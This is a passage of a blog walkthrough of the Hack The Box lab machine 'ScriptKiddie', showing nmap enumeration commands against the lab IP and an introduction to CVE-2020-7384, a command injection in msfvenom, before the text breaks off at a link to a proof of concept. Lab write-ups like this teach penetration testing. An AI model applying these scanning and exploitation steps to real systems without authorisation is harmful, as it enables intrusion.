<!DOCTYPE html>
<html ⚡>
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <title>ScriptKiddie Walkthrough - HTB | CVE-2020-7384</title>

    <meta name="description" content="After all ScriptKiddie has been retired, So I&#x27;m here for the ScriptKiddies | CVE-2020-7384 Exploit POC explain, without Metasploit">
    <link rel="icon" href="../../content/images/2021/06/favicon.ico" type="image/x-icon">
    <link rel="canonical" href="https://h4rithd.com/blog/scriptkiddie-walkthrough/index.html">
    <meta name="referrer" content="no-referrer-when-downgrade">
    
    <meta property="og:site_name" content="h4rithd.com">
    <meta property="og:type" content="article">
    <meta property="og:title" content="ScriptKiddie Walkthrough - HTB | CVE-2020-7384">
    <meta property="og:description" content="After all ScriptKiddie has been retired, So I&#x27;m here for the ScriptKiddies | CVE-2020-7384 Exploit POC explain, without Metasploit">
    <meta property="og:url" content="https://h4rithd.com/blog/scriptkiddie-walkthrough/index.html">
    <meta property="og:image" content="https://h4rithd.com/blog/content/images/2021/06/ScriptKiddieBG.jpg">
    <meta property="article:published_time" content="2021-06-05T16:28:00.000Z">
    <meta property="article:modified_time" content="2024-05-16T17:32:21.000Z">
    <meta property="article:tag" content="ScriptKiddie Walkthrough">
    <meta property="article:tag" content="CVE-2020-7384">
    <meta property="article:tag" content="h4rithd">
    <meta property="article:tag" content="Harith Dilshan">
    <meta property="article:tag" content="Retired Machines HTB">
    
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="ScriptKiddie Walkthrough - HTB | CVE-2020-7384">
    <meta name="twitter:description" content="After all ScriptKiddie has been retired, So I&#x27;m here for the ScriptKiddies | CVE-2020-7384 Exploit POC explain, without Metasploit">
    <meta name="twitter:url" content="https://h4rithd.com/blog/scriptkiddie-walkthrough/index.html">
    <meta name="twitter:image" content="https://h4rithd.com/blog/content/images/2021/06/ScriptKiddieBG.jpg">
    <meta name="twitter:label1" content="Written by">
    <meta name="twitter:data1" content="Harith Dilshan">
    <meta name="twitter:label2" content="Filed under">
    <meta name="twitter:data2" content="ScriptKiddie Walkthrough, CVE-2020-7384, h4rithd, Harith Dilshan, Retired Machines HTB">
    <meta name="twitter:site" content="@h4rithd">
    <meta name="twitter:creator" content="@h4rithd">
    <meta property="og:image:width" content="1920">
    <meta property="og:image:height" content="1035">
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "h4rithd.com",
        "url": "https://h4rithd.com/blog/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2021/06/Logo.png",
            "width": 60,
            "height": 60
        }
    },
    "author": {
        "@type": "Person",
        "name": "Harith Dilshan",
        "image": {
            "@type": "ImageObject",
            "url": "https://h4rithd.com/blog/content/images/2023/11/5-1.jpeg",
            "width": 2000,
            "height": 2000
        },
        "url": "https://h4rithd.com/blog/author/h4rithd/",
        "sameAs": [
            "https://h4rithd.com/",
            "https://twitter.com/h4rithd"
        ]
    },
    "headline": "ScriptKiddie Walkthrough - HTB | CVE-2020-7384",
    "url": "https://h4rithd.com/blog/scriptkiddie-walkthrough/",
    "datePublished": "2021-06-05T16:28:00.000Z",
    "dateModified": "2024-05-16T17:32:21.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://h4rithd.com/blog/content/images/2021/06/ScriptKiddieBG.jpg",
        "width": 1920,
        "height": 1035
    },
    "keywords": "ScriptKiddie Walkthrough, CVE-2020-7384, h4rithd, Harith Dilshan, Retired Machines HTB",
    "description": "After all ScriptKiddie has been retired, So I&#x27;m here for the ScriptKiddies 😉😉\n\nAs it is implied in the name of the machine, it&#x27;s kinda like CTF. Also in the machine&#x27;s matrix on the statistics page will give the characteristics.\n\nThe overall experience is so good. Here I explain how to use CVE-2020-7384 exploit without tackling with Metasploit Framework. PrivEsc is so simple if you can understand the shell codes. Hope you will like it. 😊😊\n\nEnough talks, 🥱 Let’s Get It Started 🐱‍💻\n\nDisclaim",
    "mainEntityOfPage": "https://h4rithd.com/blog/scriptkiddie-walkthrough/"
}
    </script>

    <meta name="generator" content="Ghost 5.72">
    <link rel="alternate" type="application/rss+xml" title="h4rithd.com" href="../../rss/index.html">

    <style amp-custom>
    *,
    *::before,
    *::after {
        box-sizing: border-box;
    }

    html {
        overflow-x: hidden;
        overflow-y: scroll;
        font-size: 62.5%;
        -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
    }

    body {
        min-height: 100vh;
        margin: 0;
        padding: 0;
        color: #3a4145;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.7rem;
        line-height: 1.55em;
        font-weight: 400;
        font-style: normal;
        background: #fff;
        scroll-behavior: smooth;
        overflow-x: hidden;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
    }

    p,
    ul,
    ol,
    li,
    dl,
    dd,
    hr,
    pre,
    form,
    table,
    video,
    figure,
    figcaption,
    blockquote {
        margin: 0;
        padding: 0;
    }

    ul[class],
    ol[class] {
        padding: 0;
        list-style: none;
    }

    img {
        display: block;
        max-width: 100%;
    }

    input,
    button,
    select,
    textarea {
        font: inherit;
        -webkit-appearance: none;
    }

    fieldset {
        margin: 0;
        padding: 0;
        border: 0;
    }

    label {
        display: block;
        font-size: 0.9em;
        font-weight: 700;
    }

    hr {
        position: relative;
        display: block;
        width: 100%;
        height: 1px;
        border: 0;
        border-top: 1px solid currentcolor;
        opacity: 0.1;
    }

    ::selection {
        text-shadow: none;
        background: #cbeafb;
    }

    mark {
        background-color: #fdffb6;
    }

    small {
        font-size: 80%;
    }

    sub,
    sup {
        position: relative;
        font-size: 75%;
        line-height: 0;
        vertical-align: baseline;
    }
    sup {
        top: -0.5em;
    }
    sub {
        bottom: -0.25em;
    }

    ul li + li {
        margin-top: 0.6em;
    }

    a {
        color: var(--ghost-accent-color, #1292EE);
        text-decoration-skip-ink: auto;
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
        margin: 0;
        font-weight: 700;
        color: #121212;
        line-height: 1.4em;
    }

    h1 {
        font-size: 3.4rem;
        line-height: 1.1em;
    }

    h2 {
        font-size: 2.4rem;
        line-height: 1.2em;
    }

    h3 {
        font-size: 1.8rem;
    }

    h4 {
        font-size: 1.7rem;
    }

    h5 {
        font-size: 1.6rem;
    }

    h6 {
        font-size: 1.6rem;
    }

    amp-img {
        height: 100%;
        width: 100%;
        max-width: 100%;
        max-height: 100%;
    }

    amp-img img {
        object-fit: cover;
    }
    
    amp-youtube {
        height: calc(100vw / 1.78);
        width: 100vw;
        position: relative;
    }

    amp-youtube img {
        position: absolute;
    }

    .page-header {
        padding: 50px 5vmin 30px;
        text-align: center;
        font-size: 2rem;
        text-transform: uppercase;
        letter-spacing: 0.5px;
    }

    .page-header a {
        color: #121212;
        font-weight: 700;
        text-decoration: none;
        font-size: 1.6rem;
        letter-spacing: -0.1px;
    }

    .post {
        max-width: 680px;
        margin: 0 auto;
    }

    .post-header {
        margin: 0 5vmin 5vmin;
        text-align: center;
    }

    .post-meta {
        margin: 1rem 0 0 0;
        text-transform: uppercase;
        color: #738a94;
        font-weight: 500;
        font-size: 1.3rem;
    }

    .post-image {
        margin: 0 0 5vmin;
    }

    .post-image img {
        display: block;
        width: 100%;
        height: auto;
    }

    .post-content {
        padding: 0 5vmin;
    }

    .post-content > * + * {
        margin-top: 1.5em;
    }

    .post-content [id]:not(:first-child) {
        margin: 2em 0 0;
    }

    .post-content > [id] + * {
        margin-top: 1rem;
    }

    .post-content [id] + .kg-card,
    .post-content blockquote + .kg-card {
        margin-top: 40px;
    }

    .post-content > ul,
    .post-content > ol,
    .post-content > dl {
        padding-left: 1.9em;
    }

    .post-content hr {
        margin-top: 40px;
    }

    .post .post-content hr + * {
        margin-top: 40px;
    }

    .post-content amp-img {
        background-color: #f8f8f8;
    }

    .post-content blockquote {
        position: relative;
        font-style: italic;
    }

    .post-content blockquote::before {
        content: "";
        position: absolute;
        left: -1.5em;
        top: 0;
        bottom: 0;
        width: 0.3rem;
        background: var(--ghost-accent-color, #1292EE);
    }

    .post-content blockquote.kg-blockquote-alt {
        font-size: 1.2em;
        font-style: italic;
        line-height: 1.6em;
        text-align: center;
        color: #738a94;
        padding: 0.75em 3em 1.25em;
    }

    .post-content blockquote.kg-blockquote-alt::before {
        display: none;
    }

    .post-content :not(.kg-card):not([id]) + .kg-card {
        margin-top: 40px;
    }

    .post-content .kg-card + :not(.kg-card) {
        margin-top: 40px;
    }

    .kg-card figcaption {
        padding: 1.5rem 1.5rem 0;
        text-align: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.4em;
        opacity: 0.6;
    }

    .kg-card figcaption strong {
        color: rgba(0,0,0,0.8);
    }

    .post-content :not(pre) code {
        vertical-align: middle;
        padding: 0.15em 0.4em 0.15em;
        border: #e1eaef 1px solid;
        font-weight: 400;
        font-size: 0.9em;
        line-height: 1em;
        color: #15171a;
        background: #f0f6f9;
        border-radius: 0.25em;
    }

    .post-content > pre {
        overflow: scroll;
        padding: 16px 20px;
        color: #fff;
        background: #1F2428;
        border-radius: 5px;
        box-shadow: 0 2px 6px -2px rgba(0,0,0,.1), 0 0 1px rgba(0,0,0,.4);
    }

    .kg-embed-card {
        display: flex;
        flex-direction: column;
        align-items: center;
        width: 100%;
    }

    .kg-image-card img {
        margin: auto;
    }

    .kg-gallery-card + .kg-gallery-card {
        margin-top: 0.75em;
    }

    .kg-gallery-container {
        position: relative;
    }

    .kg-gallery-row {
        display: flex;
        flex-direction: row;
        justify-content: center;
    }

    .kg-gallery-image {
        width: 100%;
        height: 100%;
    }

    .kg-gallery-row:not(:first-of-type) {
        margin: 0.75em 0 0 0;
    }

    .kg-gallery-image:not(:first-of-type) {
        margin: 0 0 0 0.75em;
    }

    .kg-bookmark-card,
    .kg-bookmark-publisher {
        position: relative;
    }

    .kg-bookmark-container,
    .kg-bookmark-container:hover {
        display: flex;
        flex-wrap: wrap;
        flex-direction: row-reverse;
        color: currentColor;
        background: rgba(255,255,255,0.6);
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        text-decoration: none;
        border-radius: 3px;
        box-shadow: 0 2px 6px -2px rgba(0, 0, 0, 0.1), 0 0 1px rgba(0, 0, 0, 0.4);
        overflow: hidden;
    }

    .kg-bookmark-content {
        flex-basis: 0;
        flex-grow: 999;
        padding: 20px;
        order: 1;
    }

    .kg-bookmark-title {
        font-weight: 600;
        font-size: 1.5rem;
        line-height: 1.3em;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        max-height: 45px;
        margin: 0.5em 0 0 0;
        font-size: 1.4rem;
        line-height: 1.55em;
        overflow: hidden;
        opacity: 0.8;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
    }

    .kg-bookmark-metadata {
        margin-top: 20px;
    }

    .kg-bookmark-metadata {
        display: flex;
        align-items: center;
        font-weight: 500;
        font-size: 1.3rem;
        line-height: 1.3em;
        white-space: nowrap;
        overflow: hidden;
        text-overflow: ellipsis;
    }

    .kg-bookmark-description {
        display: -webkit-box;
        -webkit-box-orient: vertical;
        -webkit-line-clamp: 2;
        overflow: hidden;
    }

    .kg-bookmark-metadata amp-img {
        width: 18px;
        height: 18px;
        max-width: 18px;
        max-height: 18px;
        margin-right: 10px;
    }

    .kg-bookmark-thumbnail {
        display: flex;
        flex-basis: 20rem;
        flex-grow: 1;
        justify-content: flex-end;
    }

    .kg-bookmark-thumbnail amp-img {
        max-height: 200px;
    }

    .kg-bookmark-author {
        white-space: nowrap;
        text-overflow: ellipsis;
        overflow: hidden;
    }

    .kg-bookmark-publisher::before {
        content: "•";
        margin: 0 .5em;
    }

    .kg-toggle-card-icon {
        display: none;
    }

    .kg-toggle-content {
        margin-top: 0.8rem;
    }

    .kg-product-card-container {
        background: transparent;
        padding: 20px;
        width: 100%;
        border-radius: 5px;
        box-shadow: inset 0 0 0 1px rgb(124 139 154 / 25%);
    }

    .kg-product-card-description p {
        margin-top: 1.5em;
    }

    .kg-product-card-description ul {
        margin-left: 24px;
    }

    .kg-product-card-title {
        font-size: 1.9rem;
        font-weight: 700;
    }

    .kg-product-card-rating-star {
        height: 28px;
        width: 20px;
        margin-right: 2px;
    }

    .kg-product-card-rating-star svg {
    width: 16px;
    height: 16px;
    fill: currentColor;
    opacity: 0.15;
    }

    .kg-product-card-rating-active.kg-product-card-rating-star svg {
    opacity: 1;
    }

    .kg-nft-card-container {
        position: relative;
        display: flex;
        flex: auto;
        flex-direction: column;
        text-decoration: none;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif;
        font-size: 1.4rem;
        font-weight: 400;
        box-shadow: 0 2px 6px -2px rgb(0 0 0 / 10%), 0 0 1px rgb(0 0 0 / 40%);
        width: 100%;
        max-width: 512px;
        color: #15212A;
        background: #fff;
        border-radius: 5px;
        transition: none;
        margin: 0 auto;
    }

    .kg-nft-metadata {
        padding: 2.0rem;
    }

    .kg-nft-image-container {
        position: relative;
    }

    .kg-nft-image {
        display: flex;
        border-radius: 5px 5px 0 0;
    }

    .kg-nft-header {
        display: flex;
        justify-content: space-between;
        align-items: flex-start;
        gap: 20px;
    }

    .kg-nft-header h4.kg-nft-title {
        font-size: 1.9rem;
        font-weight: 700;
        margin: 0;
        color: #15212A;
    }

    .kg-nft-header amp-img {
        max-width: 114px;
        max-height: 26px;
    }

    .kg-nft-opensea-logo {
        margin-top: 2px;
        width: 100px;
    }

    .kg-nft-creator {
        font-family: inherit;
        color: #95A1AD;
    }

    .kg-nft-creator span {
        font-weight: 500;
        color: #15212A;
    }

    .kg-nft-card p.kg-nft-description {
        font-size: 1.4rem;
        line-height: 1.4em;
        margin: 2.0rem 0 0;
        color: #222;
    }

    .kg-button-card {
        display: flex;
        position: static;
        align-items: center;
        width: 100%;
        justify-content: center;
    }

    .kg-btn {
        display: flex;
        position: static;
        align-items: center;
        padding: 0 2.0rem;
        height: 4.0rem;
        line-height: 4.0rem;
        font-size: 1.65rem;
        font-weight: 600;
        text-decoration: none;
        border-radius: 5px;
        transition: opacity 0.2s ease-in-out;
    }

    .kg-btn:hover {
        opacity: 0.85;
    }

    .kg-btn-accent {
        background-color: var(--ghost-accent-color, #1292EE);
        color: #fff;
    }

    .kg-callout-card {
        display: flex;
        padding: 20px 28px;
        border-radius: 3px;
    }

    .kg-callout-card-grey {
        background: rgba(124, 139, 154, 0.13);
    }

    .kg-callout-card-white {
        background: transparent;
        box-shadow: inset 0 0 0 1px rgba(124, 139, 154, 0.25);
    }

    .kg-callout-card-blue {
        background: rgba(33, 172, 232, 0.12);
    }

    .kg-callout-card-green {
        background: rgba(52, 183, 67, 0.12);
    }

    .kg-callout-card-yellow {
        background: rgba(240, 165, 15, 0.13);
    }

    .kg-callout-card-red {
        background: rgba(209, 46, 46, 0.11);
    }

    .kg-callout-card-pink {
        background: rgba(225, 71, 174, 0.11);
    }

    .kg-callout-card-purple {
        background: rgba(135, 85, 236, 0.12);
    }

    .kg-callout-card-accent {
        background: var(--ghost-accent-color);
        color: #fff;
    }

    .kg-callout-card-accent a {
        color: #fff;
    }

    .kg-callout-emoji {
        padding-right: 16px;
        line-height: 1.3;
        font-size: 1.25em;
    }

    .kg-header-card {
        padding: 6em 3em;
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
        text-align: center;
    }

    .kg-header-card.kg-size-small {
        padding-top: 4em;
        padding-bottom: 4em;
    }

    .kg-header-card.kg-size-large {
        padding-top: 12em;
        padding-bottom: 12em;
    }

    .kg-header-card.kg-width-full {
        padding-left: 4em;
        padding-right: 4em;
    }

    .kg-header-card.kg-align-left {
        text-align: left;
        align-items: flex-start;
    }

    .kg-header-card.kg-style-dark {
        background: #15171a;
        color: #ffffff;
    }

    .kg-header-card.kg-style-light {
        color: #15171a;
        border: 1px solid rgba(124, 139, 154, 0.25);
        border-width: 1px 0;
    }

    .kg-header-card.kg-style-accent {
        background-color: var(--ghost-accent-color);
    }

    .kg-header-card.kg-style-image {
        background-color: #e7e7eb;
        background-size: cover;
        background-position: center center;
    }

    .kg-header-card h2 {
        font-size: 4em;
        font-weight: 700;
        line-height: 1.1em;
        margin: 0;
    }

    .kg-header-card h2 strong {
        font-weight: 800;
    }

    .kg-header-card.kg-size-small h2 {
        font-size: 3em;
    }

    .kg-header-card.kg-size-large h2 {
        font-size: 5em;
    }

    .kg-header-card h3 {
        font-size: 1.25em;
        font-weight: 500;
        line-height: 1.3em;
        margin: 0;
    }

    .kg-header-card h3 strong {
        font-weight: 600;
    }

    .kg-header-card.kg-size-small h3 {
        font-size: 1em;
    }

    .kg-header-card.kg-size-large h3 {
        font-size: 1.5em;
    }

    .kg-header-card:not(.kg-style-light) h2,
    .kg-header-card:not(.kg-style-light) h3 {
        color: #ffffff;
    }

    .kg-header-card a.kg-header-card-button {
        display: flex;
        position: static;
        align-items: center;
        padding: 0 1.2em;
        height: 2.4em;
        line-height: 1em;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-size: 0.95em;
        font-weight: 600;
        text-decoration: none;
        border-radius: 5px;
        transition: opacity 0.2s ease-in-out;
        background-color: var(--ghost-accent-color);
        color: #ffffff;
        margin: 1.75em 0 0;
    }

    .kg-header-card a.kg-header-card-button:hover {
        opacity: 0.85;
    }

    .kg-header-card.kg-size-large a.kg-header-card-button {
        margin-top: 2em;
    }

    .kg-header-card.kg-size-small a.kg-header-card-button {
        margin-top: 1.5em;
    }

    .kg-header-card.kg-style-image a.kg-header-card-button,
    .kg-header-card.kg-style-dark a.kg-header-card-button {
        background: #ffffff;
        color: #15171a;
    }

    .kg-header-card.kg-style-accent a.kg-header-card-button {
        background: #ffffff;
        color: var(--ghost-accent-color);
    }

    .kg-audio-card {
        display: flex;
        width: 100%;
        box-shadow: inset 0 0 0 1px rgba(124, 139, 154, 0.25);
    }

    .kg-audio-thumbnail {
        display: flex;
        justify-content: center;
        align-items: center;
        width: 80px;
        min-width: 80px;
        height: 80px;
        background: transparent;
        object-fit: cover;
        aspect-ratio: 1/1;
        border-radius: 3px 0 0 3px;
    }

    .kg-audio-thumbnail.placeholder {
        background: var(--ghost-accent-color);
    }

    .kg-audio-thumbnail.placeholder svg {
        width: 24px;
        height: 24px;
        fill: white;
    }

    .kg-audio-player-container {
        position: relative;
        display: flex;
        flex-direction: column;
        justify-content: space-between;
        width: 100%;
        --seek-before-width: 0%;
        --volume-before-width: 100%;
        --buffered-width: 0%;
    }

    .kg-audio-title {
        width: 100%;
        padding: 8px 12px 0;
        border: none;
        font-family: inherit;
        font-size: 1.1em;
        font-weight: 700;
        background: transparent;
    }

    .kg-audio-player {
        display: none;
    }

    .kg-width-full.kg-card-hascaption {
        display: grid;
        grid-template-columns: inherit;
    }

    .post-content table {
        border-collapse: collapse;
        width: 100%;
    }

    .post-content th {
        padding: 0.5em 0.8em;
        text-align: left;
        font-size: .75em;
        text-transform: uppercase;
    }

    .post-content td {
        padding: 0.4em 0.7em;
    }

    .post-content tbody tr:nth-child(2n + 1) {
        background-color: rgba(0,0,0,0.1);
        padding: 1px;
    }

    .post-content tbody tr:nth-child(2n + 2) td:last-child {
        box-shadow:
            inset 1px 0 rgba(0,0,0,0.1),
            inset -1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:nth-child(2n + 2) td {
        box-shadow: inset 1px 0 rgba(0,0,0,0.1);
    }

    .post-content tbody tr:last-child {
        border-bottom: 1px solid rgba(0,0,0,.1);
    }

    .page-footer {
        padding: 60px 5vmin;
        margin: 60px auto 0;
        text-align: center;
        background-color: #f8f8f8;
    }

    .page-footer h3 {
        margin: 0.5rem 0 0 0;
    }

    .page-footer p {
        max-width: 500px;
        margin: 1rem auto 1.5rem;
        font-size: 1.7rem;
        line-height: 1.5em;
        color: rgba(0,0,0,0.6)
    }

    .powered {
        display: inline-flex;
        align-items: center;
        margin: 30px 0 0;
        padding: 6px 9px 6px 6px;
        border: rgba(0,0,0,0.1) 1px solid;
        font-size: 12px;
        line-height: 12px;
        letter-spacing: -0.2px;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
        font-weight: 500;
        color: #222;
        text-decoration: none;
        background: #fff;
        border-radius: 6px;
    }

    .powered svg {
        height: 16px;
        width: 16px;
        margin: 0 6px 0 0;
    }

    @media (max-width: 600px) {
        body {
            font-size: 1.6rem;
        }
        h1 {
            font-size: 3rem;
        }

        h2 {
            font-size: 2.2rem;
        }
    }

    @media (max-width: 400px) {
        h1 {
            font-size: 2.6rem;
            line-height: 1.15em;
        }
        h2 {
            font-size: 2rem;
            line-height: 1.2em;
        }
        h3 {
            font-size: 1.7rem;
        }
    }

    :root {--ghost-accent-color: #0065a3;}
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    <script async custom-element="amp-anim" src="https://cdn.ampproject.org/v0/amp-anim-0.1.js"></script>

</head>

<body class="amp-template">
    <header class="page-header">
        <a href="../../index.html">
                <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed" alt="h4rithd.com"></amp-img>
        </a>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">ScriptKiddie Walkthrough</h1>
                <section class="post-meta">
                    Harith Dilshan -
                    <time class="post-date" datetime="2021-06-05">05 Jun 2021</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="https://h4rithd.com/blog/content/images/2021/06/ScriptKiddieBG.jpg" width="600" height="340" layout="responsive" 
                alt="ScriptKiddie Walkthrough"
                ></amp-img>
            </figure>
            <section class="post-content">

                <p>After all ScriptKiddie has been retired, So I'm here for the ScriptKiddies 😉😉</p><hr></hr><p>As it is implied in the name of the machine, it's kinda like CTF. Also in the machine's matrix on the statistics page will give the characteristics.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-238.png" class="kg-image" width="674" height="491" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-238.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-238.png 674w" layout="responsive"></amp-img></figure><p>The overall experience is so good. Here I explain how to use <strong>CVE-2020-7384</strong> exploit without tackling with Metasploit Framework. <strong>PrivEsc </strong>is so simple if you can understand the shell codes. Hope you will like it. 😊😊</p><p>Enough talks, 🥱 Let’s Get It Started 🐱‍💻</p><p><strong>Disclaimers: </strong>No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤</p>


<div class="elfsight-app-a4de7430-6c0c-44b8-aada-9b9ac759e396"></div>

<hr></hr><h2 id="01-enumeration">01 Enumeration</h2><p>First of all I will check the status of my VPN connection and whether machine is alive or not. To do that we can simply ping to the IP address like this 👇👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-239.png" class="kg-image" width="1492" height="554" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-239.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-239.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-239.png 1492w" layout="responsive"></amp-img></figure><p>As you can see here, the <strong>TTL value is 63</strong>. That implies this machine is Linux.</p><p>As usual, let's begin with Nmap. First of all I need to know what ports are open, so run fast scan for all TCP ports.</p><pre><code class="language-bash">nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.226</code></pre><p>Here is the output 👇👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-240.png" class="kg-image" width="1868" height="1106" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-240.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-240.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-240.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-240.png 1868w" layout="responsive"></amp-img></figure><p>So, there are only two open ports. 🤔🤔</p><h3 id="011-run-nmap-scripting-engine">01.1 Run Nmap Scripting Engine</h3><p>To get the best result, we can run the <code>Nmap Scripting Engine</code> for all open ports. Now we know all of the open ports and therefore, we can point out and run the script engine as fast as possible.</p><pre><code class="language-bash">nmap -sV -sC -oN DetailPorts.nmap -p 22,5000 10.10.10.226</code></pre><p>Here is the output. 👇👇</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-241.png" class="kg-image" width="1992" height="922" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-241.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-241.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-241.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-241.png 1992w" layout="responsive"></amp-img></figure><p>By looking at the SSH service info we can definitely say that the Operating System is <strong>Ubuntu </strong>and  <a href="https://launchpad.net/ubuntu/+source/openssh/1:8.2p1-4?ref=192.168.184.133" rel="noopener noreferrer">launchpad</a> information gives us the flavor is <strong>Focal Fossa</strong>. Kind of cute ah!😉😉</p><p>You can search known exploits for SSH but trust me nothing can be found!.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-242.png" class="kg-image" width="1192" height="370" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-242.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-242.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-242.png 1192w" layout="responsive"></amp-img></figure><p>Now we have only one port left and it is <strong>5000/tcp</strong>. As in the Nmap results, that port is running a web server called <strong>Werkzeug.</strong></p><blockquote><strong>Werkzeug</strong> is a comprehensive WSGI web application library. It began as a simple collection of various utilities for WSGI applications and has become one of the most advanced WSGI utility libraries. <a href="https://werkzeug.palletsprojects.com/en/2.0.x/?ref=192.168.184.133" rel="noopener noreferrer">source</a></blockquote><p>Since it is a webserver, let's browse using Firefox. You are free to use your own fav browser. But remember! sometimes we need to intercept the web traffic. I have already configured Firefox browser with burp certificate. That's why I'm using Firefox 🦊🦊</p><p>Open web browser and navigate to<strong> http://10.10.10.226:5000/</strong></p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-243.png" class="kg-image" width="1586" height="775" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-243.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-243.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-243.png 1586w" layout="responsive"></amp-img></figure><p>By looking at the interface, we realize that certainly we have plenty of enumerations here. Isn't that so mate?? 🤦‍♂️🤦‍♂️</p><p>After doing a number of enumerations, (LFI,SSRF,RCE etc..) I found the Foothold. 🤠🤠</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-244.png" class="kg-image" width="640" height="1088" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-244.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-244.png 640w" layout="responsive"></amp-img></figure><hr></hr><h2 id="02-foothold-with-out-using-msf">02. Foothold | With out using MSF</h2><p>Now we have the gun. Let's load it and shoot 🔫</p><p>I neglected to mention what is that vulnerability. Therefore, let me introduce the <strong>CVE-2020-7384</strong> 🎇🎇 Actually that vulnerability works on the Metasploit's msfvenom payload generator. Here is a small description of the vulnerability from <a href="https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/?ref=192.168.184.133" rel="noopener noreferrer">Rapid7</a></p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-245.png" class="kg-image" width="1090" height="229" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-245.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-245.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-245.png 1090w" layout="responsive"></amp-img></figure><p>But we are not playing here with metasploit. Let's do it manually ok?? 🦽😉</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-246.png" class="kg-image" width="480" height="360" layout="responsive"></amp-img></figure><p>Here is the POC code for the vularability. 👇👇</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md?ref=192.168.184.133"><div class="kg-bookmark-content"><div class="kg-bookmark-title">justinsteven/advisories</div><div class="kg-bookmark-description">Contribute to justinsteven/advisories development by creating an account on 